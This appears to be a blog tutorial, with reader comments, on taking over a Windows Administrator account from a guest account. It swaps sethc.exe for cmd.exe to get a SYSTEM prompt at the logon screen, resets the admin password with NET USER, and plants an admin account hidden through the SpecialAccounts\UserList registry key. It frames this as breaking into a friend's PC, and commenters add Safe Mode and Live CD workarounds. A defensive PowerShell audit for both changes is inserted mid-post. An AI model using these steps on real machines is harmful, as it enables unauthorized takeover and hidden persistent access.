Recover Administrator's Password through Guest Account without Changing the Password!

Last updated on By Mohsin Patel in Windows

Ever wanted to break into your Administrator account when you don't know the account password? Or just wanted to step into your friend's PC to make him gawk when you tell your success story of magic? Well, there is a great way of hacking an administrator account from a guest account, by which you can reset the administrator password and get all the privileges an administrator enjoys on Windows. Interested? Read on…

Concept

Press the Shift key 5 times and the Sticky Keys dialog shows up. This works even at the logon screen. But if we replace sethc.exe, which is responsible for the Sticky Keys dialog, with cmd.exe, and then call sethc.exe by pressing the Shift key 5 times at the logon screen, we get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password, even from a guest account.

Prerequisites

Guest account with write access to System32.

Method 1 (Change Admin Password)

Here is how to do that:

1. Go to C:\Windows\System32.
2. Copy cmd.exe and paste it on the desktop.
3. Rename cmd.exe to sethc.exe.
4. Copy the new sethc.exe to System32. When Windows asks about overwriting the file, click Yes.
5. Now log out from your guest account and, at the user select window, press the Shift key 5 times.
6. Instead of the Sticky Keys confirmation dialog, a command prompt with full administrator privileges will open.
7. Now type “NET USER ADMINISTRATOR aaa”, where “aaa” can be any password you like, and press Enter.
8. You will see “The command completed successfully”. Then exit the command prompt and log in as administrator with your new password.
9. Congrats, you have hacked admin from a guest account.

Method 2 (Access admin without changing password)

Also, you can create a new user at the command prompt by typing “NET USER KnowBest/ADD”, where “KnowBest” is the username you would like to add with administrator privileges. Then hide your newly created admin account as follows.

Go to the registry editor and navigate to this key:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here, create a new “DWORD value” and name it “KnowBest” (the username that you entered in the previous step). Now you can live with your admin account forever :)
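
To check a machine for the two changes described above (a replaced sethc.exe and an account hidden through SpecialAccounts\UserList), the following read-only PowerShell audit can be used. It is an added example, not part of the original post; it assumes PowerShell 4.0 or later for Get-FileHash, the `$findings` variable name is illustrative, and the OriginalFilename check goes slightly beyond the cmd.exe case by flagging any binary that is not the genuine sethc.exe.

```powershell
# Added example: audit for a replaced sethc.exe and for accounts hidden
# from the logon screen. Read-only; run from an elevated PowerShell prompt.
$sys32    = Join-Path $env:SystemRoot 'System32'
$sethc    = Join-Path $sys32 'sethc.exe'
$cmd      = Join-Path $sys32 'cmd.exe'
$findings = @()   # illustrative name, collects human-readable results

if (-not (Test-Path $sethc)) {
    $findings += 'sethc.exe is missing from System32'
} else {
    # 1. A copied cmd.exe is byte-identical to the real one, so hashes match.
    $sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
    $cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
    if ($sethcHash -eq $cmdHash) {
        $findings += 'sethc.exe is byte-identical to cmd.exe'
    }

    # 2. Renaming a file does not change its embedded version resource.
    #    The genuine binary reports sethc.exe (possibly with a .mui suffix).
    $orig = (Get-Item $sethc).VersionInfo.OriginalFilename
    if ($orig -notmatch '^sethc\.exe') {
        $findings += "sethc.exe has OriginalFilename '$orig'"
    }
}

# 3. Value names under SpecialAccounts\UserList with data 0 are hidden
#    from the logon screen.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $key) {
    $reg = Get-Item $key
    foreach ($name in $reg.GetValueNames()) {
        if ($reg.GetValue($name) -eq 0) {
            $findings += "Account '$name' is hidden from the logon screen"
        }
    }
}

if ($findings.Count -eq 0) {
    'No sethc.exe replacement or hidden accounts found.'
} else {
    $findings | ForEach-Object { "FINDING: $_" }
}
```

Any finding means someone already had write access to System32 or to the HKLM registry hive, so it should be followed by a review of local accounts and of who holds write permission on those locations.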

ABOUT Mohsin Patel

Software Developer from Bharuch, Gujarat, working as a .NET developer and a part-time blogger. My areas of interest are Web Development, WordPress, SEO and Blogging.

9 Comments

  1. Avik

    ma ma mia !!
    u don’t seem to have done this a million times
    but ever tried on a guest acc. u could do that …
    u don't have the privileges …
    try some other tricks and if you know another pls reply me…

  2. deepak

    hello my dear, this trick doesn’t work as access is denied in the guest account.
    we can’t copy the sethc.exe file back to system-32.
    please give another trick
    I'm waiting ……..

  3. Mohsin

    @Fatima

    Yep, this trick was working before the release of XP SP2.

    Well, you can still crack the password using a Live CD.

    Just boot up with the CD. Follow the steps. You will get the Administrator account reset .. :)

    Let me know your actual situation on XP.

    From where ?? If you are near my location then I will personally reset that.

    Regards :)

  4. Fatima

    Yh, this trick doesn't work on the guest account,
    can you please tell me if u knw any trick that would work with the guest account,
    i will be waiting for your reply, reply ASAP
    coz i m having some problems!!!

    Thanks!!!

  5. Basset

    It worked for me. Thanks!!

  6. Imran

    hello my dear, this trick doesn’t work as access is denied in the guest account.
    we can’t copy the sethc.exe file back to system-32.
    please give another trick
    I'm waiting ……..

  7. Ahmed

    for everyone that couldn’t copy to system32…
    try Safe Mode. :)

  8. Kiran

    But guest has no system32 folder access. How can I reset the administrator password using a guest user with limited access?

  9. vikas atray

    hello my dear, this trick doesn’t work as access is denied in the guest account.
    In the guest account: we can’t copy the sethc.exe file back to system-32.
    (there is an "access is denied" error.)
    please give another trick
    I'm waiting ……..
